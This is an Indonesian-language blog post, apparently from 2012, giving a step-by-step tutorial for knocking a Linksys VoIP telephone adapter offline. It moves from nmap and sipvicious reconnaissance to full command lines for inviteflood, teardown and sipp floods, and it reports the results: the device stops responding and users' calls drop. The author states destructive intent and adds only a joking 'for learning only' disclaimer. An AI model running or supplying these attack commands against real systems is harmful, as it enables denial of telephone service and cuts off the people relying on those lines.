18 Mar 2012

0

VoIP Bomber

  • 18 Mar 2012
  • Unknown
  • Mungkin buat agan yang bermimpi pengen jadi Terrorist sebaiknya jangan deh, ntar ditangkap S.W.A.T, hahaha
    aku lagi mau berbagi tips hack ni, ya mungkin agak mirip Terrorist kali ya...
    beda banget lah gan...
    perangkat tersebut hanya : VoIP ATA.
    yang jelas agan harus punya,
    oh ya mau tahu singkatannya??, singkatannya ini loh
    VoIP = Voice Over IP, dan ATA = Analog Telephone Adapter.

    oke langsung aja gan...
    Perangkat ini akan saya lakukan tindakan destruktif sehingga VoIP ATA tidak bisa digunakan untuk sementara dan terputus dari jalur VoIP services.  Teknik penyerangan ini berlaku pada semua pemodelan VoIP alias tidak terbatas pada topologi yang disimulasikan.
    Persiapan :
    1. Laptop

    2. OS Backtrack, saya menggunakan Backtrack 5 code name : Revolution

    3. Wlan0, saya mempergunakan jaringan wireless dalam penyerangan
    Kegiatan Penyerangan :
    1. Memastikan IP pada interface wlan0


    Ya, saya harus memastikannya karena saya terkoneksi pada sebuah Wireless AP Router sehingga DHCP server memberikan IP untuk devices yang saya pergunakan :


    Analisa :
    Nah, laptop saya sudah mendapatkan IP dari DHCP Server, yaitu : 192.168.1.68, mari lanjutkan pada langkah berikutnya.


    2. Melakukan scanning untuk mengidetifikasikan host live
    Pada langkah pertama sudah didapatkan IP : 192.168.1.68, maka langkah berikutnya saya akan melakukan pencarian informasi yang lebih mendalam dengan melakukan scanning massal.
    Disini hanya diperlukan sedikit analisa saja, yaitu menentukan 1 segment range IP yang akan discanning massal, maka 1 range IP tersebut adalah IP : 192.168.1.1 sampai dengan IP : 192.168.1.254.
    Saya mempergunakan NMAP dengan metoda "intense scan & no ping", dengan perintah sbb :
    root@bt:~# nmap -T4 -A -v -Pn 192.168.1.1-254




    Analisa :
    Wah...hasil laporan NMAP begitu panjang dan menggoda...pasti disukai para wanita...lol, sehingga didapatkan informasi bahwa pada IP : 192.168.1.80 terindikasi sebagai perangkat VoIP.

    Kok tau itu perangkat VoIP...?
    gini masbro... perhatikan pada baris 29,30,31. Baris-baris tersebut menunjukan kalau itu adalah perangkat VoIP.
    Perhatikan juga pada baris 27 "80/tcp open tcpwrapped" yang mengindikasikan bahwa perangkat VoIP tersebut mengaktifkan metoda penyetingan berbasis web base (http) yang bisa menjadi target penyerangan berikutnya..lol
    Untuk lebih detailnya maka akan dilakukan proses "fingerprint" pada langkah berikutnya.

    3. FingerPrint
    Okay...kegiatan ini hanyalah kegiatan untuk memastikan bahwa target yang menjadi incaran adalah benar-benar target alias kagak salah sasaran.

    root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.1-254

    
    
    
    
    
    
    Analisa :
    Uhhhuuuyyyy... ternyata benar bahwa IP 192.168.1.80 adalah perangkat VoIP dengan SIP Port 5060.
    Tidak hanya itu, merk dan series perangkat VoIP pun bisa didapatkan yaitu : Linksys/PAP2T-3.1.15(LS).
    Mari mang....kita lanjutkan pada proses fingerprint yang lebih bermutu :

    root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.80 -d









    Analisa:
    Pusing.....?? santai gan... dari hasil fingerprint tersebut, kita mendapatkan :

    1. IP perangkat VoIP : 192.168.1.80, dengan SIP port 5060
    2. Pada baris 3, didapatkanlah VoIP number extention yaitu : 100 yang didapat dari sip:100@1.1.1.1 3. Pada baris 3, didapatkan juga toTag number, yaitu : 388074baa08bb653i0
    4. Pada baris 4, didptkan jg fromTag number, yaitu : 63306138303135303133633401373935303131393234
    5. Pada baris 5, didapatkan Call-ID, yaitu : 785522139741125439084511
    6. Pada baris 7, didapatkan protocol yang digunakan untuk jalur VoIP
    , jg didapatkan branch, yaitu : z9hG4bK-3073480069
    7. Pada baris 8 menerangkan bahwa Server berbasis: Linksys/PAP2T 3.1.15(LS)

    Sungguh...mangtabs sekali informasi2 tersebut dan sangat berguna dalam melakukan penyerangan VoIP.

    4.  Penyerangan
    Mari kita lakkukan penyerangan... ingat penyerangan iini hanya untuk pembelajaran saja, segala tindakan destruktif saya tidak bertanggung jawab.

    * InviteFlood :
    ----------------

    Teknik penyerangan yang seolah2 VoIP devices diajak untuk melakukan komunikasi dengan banyak user.
    root@bt:/pentest/voip/inviteflood# 
    ./inviteflood <interface> <ekstensi> <IP_Domain> <IPHost_Target> <JlhPaket_Data>
    
    
    root@bt:/pentest/voip/inviteflood# 
    ./inviteflood wlan0 100 192.168.1.80 192.168.1.80 10000000
    







    Hasil selama pengiriman paket data berlangsung :
    * root@bt:/pentest/voip/sipp# ping 192.168.1.80
    PING 192.168.1.80 (192.168.1.80) 56(84) bytes of data
    (berhenti tanpa respon apapun)
    * Port 80 HTTP pun tewas
    * Jalur VoIP tidak bisa dihubungi

    * VoIP Enduser mengalami terputusnya koneksi
    * Semakin banyak jumlah paket dalam yang dikirim berarti semakin lama tewasnya VoIP devices target !!

    * tearDown attacking
    -------------------------
    Penyerangan dengan melumpuhkan semua client (user) yang terkoneksi pada VoIP devices.
    O iya, pada Backtrack 5 aplikasi teardown tidak tersedia oleh karena itu Anda harus mengambilnya a.k.a download di : http://www.hackingvoip.com/tools/teardown.tar.gz, jangan lupa aplikasi ini membutuhkan Ruby 1.8 keatas.
    Untuk menggunakan "tearDown" diperlukan hasil analisa dari fingerprint (proses 3), yaitu :
    1. IP perangkat VoIP : 192.168.1.80, dengan SIP port 5060
    2. Pada baris 3, didapatkanlah VoIP number extention yaitu : 100 yang didapat dari sip:100@1.1.1.1 3. Pada baris 3, didapatkan juga toTag number, yaitu : 388074baa08bb653i0
    4. Pada baris 4, didptkan jg fromTag number, yaitu : 63306138303135303133633401373935303131393234
    5. Pada baris 5, didapatkan Call-ID, yaitu : 785522139741125439084511
    6. Pada baris 7, didapatkan protocol yang digunakan untuk jalur VoIP
    , jg didapatkan branch, yaitu : z9hG4bK-3073480069
    7. Pada baris 8 menerangkan bahwa Server berbasis: Linksys/PAP2T 3.1.15(LS)

    Mari gunakan informasi tersebut sebagai parameter penyerangan dengan tearDown, sbb :

      root@bt:/pentest/voip/teardown#
     ./teardown <interface> <extention> <sip_proxy> <IP_target> <callID> <fromTag> <toTag>
     ./teardown wlan0 100 192.168.1.80 192.168.1.80 785522139741125439084511 
       63306138303135303133633401373935303131393234 388074baa08bb653i0
      
    Hasil penyerangan :
    * Jalur komunikasi VoIP yang dipergunakan oleh user terputus !!



    * SIP protocol attacking :
    ----------------------------
    Penyerangan dengan cara memberikan koneksi "total-call" user yang berlebihan sehingga SIP tidak lagi mampu memberikan layanan.

        root@bt:/pentest/voip/sipp# ./sipp -sn uac <ip_target>
        root@bt:/pentest/voip/sipp# ./sipp -sn uac 192.168.1.80
      

    Hasil penyerangan :
    * Layanan SIP terganggu bahkan terhenti karena adanya total-call yang berlebihan karena limit-calls = 48 sedangkan total-calls sudah mencapai = 365.
    * Penyerangan bisa dilipatgandakan dengan menekah tombol "+" (tanda tanda kutip)


    Akhirnya selesai sudah tulisan ini saya buat, tiada maksud untuk menambah kejahatan otak...
    Semuanya hanya untuk pembelajaran saja, jika anda mau dosa hanya agan yang tanggung.
     

    0 Responses to “VoIP Bomber”


    *Important - If you want to be informed of any replies to your comment, check the "Subscribe By Email" before submitting. Please Do Not Spam

    Posting Komentar

    Komentarlah Sebaik Saya Menyuguhkan Artikel.
    Karena Komentar Anda Merupakan Emas Bagi Blog Saya.